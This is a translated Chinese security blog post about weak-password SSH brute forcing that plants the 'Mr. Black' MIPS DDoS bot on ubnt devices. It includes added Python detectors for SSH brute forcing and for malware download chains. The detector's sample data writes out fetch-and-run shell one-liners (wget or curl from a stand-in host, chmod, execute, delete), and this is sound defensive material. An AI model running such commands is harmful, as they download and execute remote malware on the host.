Threat warning: a large number of ubnt devices have a backdoor vulnerability - 黑吧安全网 (myhack58)

2015-03-29T00:00:00
ID MYHACK58:62201560482
Type myhack58
Reporter Anonymous (佚名)
Modified 2015-03-29T00:00:00

Description

This article walks through the whole process: discovering a hacker attack, analysing the intrusion, counter-hacking the attacker's server, obtaining access to it and collecting complete evidence. Intrusions of this kind are now very common; they are not targeted attacks aimed at a specific system but "blind scan" attacks.

Recently, the Anheng security research team observed a large number of brute-force attacks against port 22 using weak passwords. After detailed analysis, the team found that many ubnt devices on the Internet use weak passwords, and that a hacker is using an automated tool to implant a backdoor on them. Anheng's APT early-warning platform successfully detected this attack:

[Figure: alert raised by the APT early-warning platform]
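As an added example (not code from the article or from Anheng's platform), the following Python script shows one way a defender can recognise the port-22 brute-force pattern described above in OpenSSH auth.log lines: it counts failed password logins per source address inside a sliding time window and records when the same address later succeeds with a password, which is what a guessed weak password looks like in the log. The log lines, host name and addresses (documentation ranges) are constructed for this example.

```python
"""Detect SSH password brute forcing, and password guesses that succeeded, in auth.log text."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample auth.log lines (OpenSSH format); the addresses are documentation ranges.
SAMPLE_AUTH_LOG = """\
Mar 19 02:14:01 gw sshd[1201]: Failed password for root from 203.0.113.7 port 51222 ssh2
Mar 19 02:14:03 gw sshd[1203]: Failed password for ubnt from 203.0.113.7 port 51230 ssh2
Mar 19 02:14:04 gw sshd[1205]: Failed password for admin from 203.0.113.7 port 51236 ssh2
Mar 19 02:14:06 gw sshd[1207]: Failed password for root from 203.0.113.7 port 51240 ssh2
Mar 19 02:14:09 gw sshd[1209]: Accepted password for ubnt from 203.0.113.7 port 51244 ssh2
Mar 19 02:20:00 gw sshd[1300]: Failed password for admin from 198.51.100.5 port 40000 ssh2
Mar 19 03:00:00 gw sshd[1400]: Accepted publickey for ops from 192.0.2.9 port 33000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_auth_log(text, year=2015):
    """Yield (timestamp, result, method, user, ip) for every sshd login line.

    syslog timestamps carry no year, so the caller supplies it.
    """
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["method"], m["user"], m["ip"]))
    return events


def detect_bruteforce(text, threshold=3, window=timedelta(minutes=5), year=2015):
    """Return {ip: summary} for sources with >= threshold failed passwords inside `window`.

    The summary also records a later successful *password* login from the same
    source, the tell-tale sign that one of the guessed passwords was correct.
    """
    events = sorted(parse_auth_log(text, year))
    failures = defaultdict(list)  # ip -> [(timestamp, user)]
    hits = {}
    for ts, result, method, user, ip in events:
        if result == "Failed":
            failures[ip].append((ts, user))
            recent = [u for t, u in failures[ip] if ts - t <= window]
            if len(recent) >= threshold:
                hits.setdefault(ip, {"failures": 0, "users": [], "success_as": None})
        elif result == "Accepted" and method == "password" and ip in hits:
            hits[ip]["success_as"] = user
    for ip, summary in hits.items():
        summary["failures"] = len(failures[ip])
        summary["users"] = sorted({u for _, u in failures[ip]})
    return hits


if __name__ == "__main__":
    for ip, summary in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, summary)
```

On a device whose only credential is a guessed password, the `success_as` field is the line worth acting on first: that account should be treated as compromised and its password, and any keys added to it, reviewed.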

On March 19 a customer reported a network fault. After contacting the customer, an Anheng engineer carried out remote emergency response and found some suspicious shell processes on one of the customer's devices.

[Figure: suspicious shell processes on the customer's device]

Analysis showed that the main function of these shell scripts is to download some suspicious files with wget, run them, and finally delete the downloaded files, which makes later forensics difficult.
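The download, run, delete chain described above leaves little on disk, but it is easy to recognise in the script text itself, wherever a defender captures it (a process listing, a cron entry, a shell history or a dropped script). The following Python detector is an added example, not code from the article: it splits each line into its individual commands, pairs the file a downloader saved with the file that was later executed and removed, and collects the download hosts as indicators. The sample lines, the host 203.0.113.10 and the file names are constructed to mirror the pattern; the wget/curl option handling covers only the common cases.

```python
"""Flag download-execute-delete command chains in captured shell script text."""
import os
import shlex
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed sample: the first two lines show the chain, the third only downloads.
SAMPLE_SCRIPT = """\
cd /tmp; wget http://203.0.113.10/10010; chmod +x 10010; ./10010; rm -f 10010
cd /var/run && curl -O http://203.0.113.10/hope9 && chmod 777 hope9 && ./hope9 && rm -rf hope9
wget http://203.0.113.10/update.tar.gz -O /tmp/update.tar.gz
ls -la /tmp
"""

DOWNLOADERS = {"wget", "curl"}          # URL-based fetchers; tftp-style tools need their own parser
SEPARATORS = {";", "&&", "||", "|", "&"}


@dataclass
class Finding:
    line_no: int
    downloads: list = field(default_factory=list)  # (host, saved file name)
    executed: list = field(default_factory=list)   # file names run directly or via sh
    deleted: list = field(default_factory=list)    # file names passed to rm

    def chain(self):
        """File names that were downloaded, then run, then removed on this line."""
        saved = {name for _, name in self.downloads}
        return sorted(saved & set(self.executed) & set(self.deleted))

    @property
    def is_download_execute_delete(self):
        return bool(self.chain())


def split_commands(line):
    """Split a shell one-liner on ; && || | & into argv lists, respecting quotes."""
    lex = shlex.shlex(line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    cmds, cur = [], []
    for tok in lex:
        if tok in SEPARATORS:
            if cur:
                cmds.append(cur)
                cur = []
        else:
            cur.append(tok)
    if cur:
        cmds.append(cur)
    return cmds


def _download_target(cmd, argv):
    """Return (host, saved file name) for a wget/curl command, or None."""
    urls = [a for a in argv[1:] if "://" in a]
    if not urls:
        return None
    parts = urlsplit(urls[0])
    name = os.path.basename(parts.path)
    rename_flag = "-O" if cmd == "wget" else "-o"   # wget -O file / curl -o file
    for i in range(1, len(argv) - 1):
        if argv[i] == rename_flag and "://" not in argv[i + 1]:
            name = os.path.basename(argv[i + 1])
    return (parts.hostname or "", name)


def analyze_line(line_no, line):
    finding = Finding(line_no)
    for argv in split_commands(line):
        cmd = os.path.basename(argv[0])
        if cmd in DOWNLOADERS:
            target = _download_target(cmd, argv)
            if target:
                finding.downloads.append(target)
        elif cmd == "rm":
            finding.deleted += [os.path.basename(a) for a in argv[1:] if not a.startswith("-")]
        elif cmd in ("sh", "bash") and len(argv) > 1:
            finding.executed.append(os.path.basename(argv[-1]))
        elif "/" in argv[0]:                         # ./name or /tmp/name run directly
            finding.executed.append(cmd)
    return finding


def scan(script_text):
    """Analyze every non-empty line of a captured script."""
    return [analyze_line(n, ln) for n, ln in enumerate(script_text.splitlines(), 1) if ln.strip()]


def indicators(findings):
    """Distinct (host, file name) pairs that were fetched, for blocking and hunting."""
    return {d for f in findings for d in f.downloads}


if __name__ == "__main__":
    results = scan(SAMPLE_SCRIPT)
    for f in results:
        if f.is_download_execute_delete:
            print(f"line {f.line_no}: download-execute-delete of {f.chain()}")
    print("indicators:", sorted(indicators(results)))
```

Because the dropped binary is removed after it starts, the indicator that survives is the process itself plus the download host; the `indicators` set is what goes into the egress block list and into a search of other devices' web-proxy or flow logs.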

We tried to open the malicious pages involved; they are shown below:

[Figures: the two malicious download pages]

From the figures above we can see that:

Suspicious IP 222.*.*.62: the file "10010" was downloaded 9108 times in one day.

Suspicious IP 180.*.*.241: the file "hope9" was downloaded 396 times in 4 to 8 minutes.

After analysis, we found that both suspicious files are MIPS-architecture DDoS tools, which foreign researchers call "Mr. Black".

[Figure: the downloaded files identified as the "Mr. Black" MIPS DDoS tool]

Their main function is to carry out common DDoS attacks such as GET_Flood, SYN_Flood and UDP_Flood.

The next day we kept observing and found that the download count of one of the malicious files had risen from the original 9108 to 15171.

[Figure: download count of the malicious file on the following day]
